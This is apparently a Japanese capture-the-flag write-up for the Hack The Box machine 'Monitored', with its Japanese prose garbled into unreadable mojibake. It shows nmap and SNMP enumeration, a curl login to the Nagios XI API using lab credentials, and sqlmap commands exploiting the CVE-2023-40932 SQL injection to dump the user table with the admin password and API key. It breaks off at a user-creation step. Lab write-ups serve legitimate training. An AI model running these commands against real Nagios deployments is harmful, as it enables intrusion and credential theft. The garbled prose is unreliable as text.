ã€Hack The Boxã€‘monitored - å®¶studyã‚’ã¤ã¥ã£ã¦

ç›®æ¬¡

åµå¯Ÿï¼ã‚¹ã‚ãƒ£ãƒ³

nmapã§ã‚¹ã‚ãƒ£ãƒ³ã—ã¾ã™ã€‚

-p-ã§ã‚¹ã‚ãƒ£ãƒ³ã—ã€ç¢ºèªã§ããŸãƒãƒ¼ãƒˆã«è©³ç´°ãªã‚¹ã‚ãƒ£ãƒ³ã‚’è¡Œã„ã¾ã™ã€‚

â”Œâ”€â”€(kaliã‰¿kali)-[~/htb/monitored]
â””â”€$ sudo nmap -sC -sV -A -O -p22,80,389,443,5667  10.10.11.248
Nmap scan report for 10.10.11.248
Host is up (0.17s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
|   256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_  256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp   open  http       Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/https  Apache/2.4.56 (Debian)
|_http-server-header: Apache/2.4.56 (Debian)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: Nagios XI
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after:  2297-08-25T21:46:55
5667/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   186.48 ms 10.10.14.1
2   186.83 ms 10.10.11.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.62 seconds

TCP/443ã®èª¿æŸ»

/etc/hostsã«nagios.monitored.htbã‚’è¿½åŠ ã—ãƒ–ãƒ©ã‚¦ã‚¶ã§ã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹ã¨ä»¥ä¸‹ã®ã‚ˆã†ãªãƒšãƒ¼ã‚¸ãŒè¡¨ç¤ºã•ã‚Œã¾ã™ã€‚

NagiosXIã®ãƒ‡ãƒ•ã‚©ãƒ«ãƒˆã‚¢ã‚«ã‚¦ãƒ³ãƒˆã‚’è©¦ã—ã«å…¥åŠ›ã—ã¦ã¿ã¾ã—ãŸãŒã€ã‚¢ã‚¯ã‚»ã‚¹ã¯ã§ãã¾ã›ã‚“ã§ã—ãŸã€‚

support.nagios.com

Â

ãã®ä»–ã€ldapç‰ã‹ã‚‰ã¯æœ‰åŠ›ãªæƒ…å ±ã‚’å–å¾—ã§ãã¾ã›ã‚“ã§ã—ãŸã€‚

ã¤ã¥ã‘ã¦UDPã®ã‚¹ã‚ãƒ£ãƒ³ã‚’è¡Œã„ã¾ã™ã€‚SNMPãŒé–‹ã„ã¦ã„ã‚‹ã“ã¨ãŒã‚ã‹ã‚Šã¾ã™ã€‚

â”Œâ”€â”€(kaliã‰¿kali)-[~/htb/monitored]
â””â”€$ sudo nmap -sU -p- 10.10.11.248 --open -T4 -Pn --min-rate=1000
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.21s latency).
Not shown: 65078 open|filtered udp ports (no-response), 455 closed udp ports (port-unreach)
PORT    STATE SERVICE
123/udp open  ntp
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 458.98 seconds

SNMPã«å¯¾ã—ã¦åˆ—æŒ™ã‚’è¡Œã„ã¾ã™ã€‚

snmpbulkwalk -v 2c -c public 10.10.11.248

ã€Œsvcã€ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã§ã‚·ã‚§ãƒ«ã‚’å®Ÿè¡Œã—ã¦ã„ã‚‹æƒ…å ±ãŒç¢ºèªã§ãã¾ã™ã€‚

ä¸Šè¨˜ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã§ã¯NagiosXIã«ãƒã‚°ã‚¤ãƒ³ã§ãã¾ã›ã‚“ã§ã—ãŸã€‚

ãƒã‚°ã‚¤ãƒ³æ™‚ã®ã‚¨ãƒ©ãƒ¼ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸

Googleæ¤œç´¢ã§ã€Œ"nagios xi" "api" "curl" "authenticate"ã€ã¨æ¤œç´¢ã™ã‚‹ã¨ä»¥ä¸‹ã®è¨˜äº‹ãŒè¦‹ã¤ã‹ã‚Šã¾ã™ã€‚

support.nagios.com

ä¸Šè¨˜ã§/nagiosxi/api/v1/authenticate?pretty=1ã«ãƒªã‚¯ã‚¨ã‚¹ãƒˆã™ã‚‹ä¾‹ãŒã‚ã‚Šã¾ã™ã€‚
å®Ÿéš›ã«å®Ÿè¡Œã™ã‚‹ã¨tokenãŒå–å¾—ã§ãã¾ã™ã€‚

curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=5'Â

ãƒã‚°ã‚¤ãƒ³ç”»é¢ã§ä¸Šè¨˜ã§å–å¾—ã—ãŸtokenã‚’åˆ©ç”¨ã™ã‚‹ã¨svcã§ãƒã‚°ã‚¤ãƒ³ãŒã§ãã¾ã—ãŸã€‚

ã‚¢ã‚¯ã‚»ã‚¹å–å¾—ï¼ˆãƒ¦ãƒ¼ã‚¶ãƒ•ãƒ©ã‚°ï¼‰

ãƒã‚°ã‚¤ãƒ³å¾Œã®ç”»é¢ã§ã¯ãƒãƒ¼ã‚¸ãƒ§ãƒ³æƒ…å ±ãŒç¢ºèªã§ãã¾ã™ã€‚
ãƒãƒ¼ã‚¸ãƒ§ãƒ³æƒ…å ±ã§æ¤œç´¢ã™ã‚‹ã¨ã€ŒCVE-2023-40932ã€ã®è„†å¼±æ€§æƒ…å ±ãŒç¢ºèªã§ãã¾ã™ã€‚
ã€Œ/nagiosxi/admin/banner_message-ajaxhelper.phpã€ã¸ãƒªã‚¯ã‚¨ã‚¹ãƒˆã‚’é€ä¿¡ã™ã‚‹éš›ã®idãƒ‘ãƒ©ãƒ¡ãƒ¼ã‚¿ãŒã‚µãƒ‹ã‚¿ã‚¤ã‚ºã•ã‚Œãªã„è„†å¼±æ€§ã¨ã®ã“ã¨ã§ã™ã€‚

outpost24.com

ç¾åœ¨ã®ã‚»ãƒƒã‚·ãƒ§ãƒ³ã®Cookieæƒ…å ±ã‚’ç¢ºèªã—ä»¥ä¸‹ã®ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã—ã¾ã™ã€‚

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=*&action=acknowledge_banner_message?id=3" --cookie "nagiosxi=ã“ã“ã¯è‡ªèº«ã®Cookie" --batch --dbs

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=*&action=acknowledge_banner_message" --cookie "nagiosxi=ã“ã“ã¯è‡ªèº«ã®Cookie" --batch -D nagiosxi --tables

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=*&action=acknowledge_banner_message" --cookie "nagiosxi=ã“ã“ã¯è‡ªèº«ã®Cookie" --batch -D nagiosxi -T xi_users --dump

svcã«åŠ ãˆã¦ã€Nagios Administratorã®ãƒ‘ã‚¹ãƒ¯ãƒ¼ãƒ‰ã¨APIã‚ãƒ¼ãŒå–å¾—ã§ãã¾ã—ãŸã€‚

ä¸Šè¨˜ã®ã‚ãƒ¼ã‚’ä½¿ç”¨ã—ã¦ãƒ¦ãƒ¼ã‚¶ã‚’ä½œæˆã—ã¾ã™ã€‚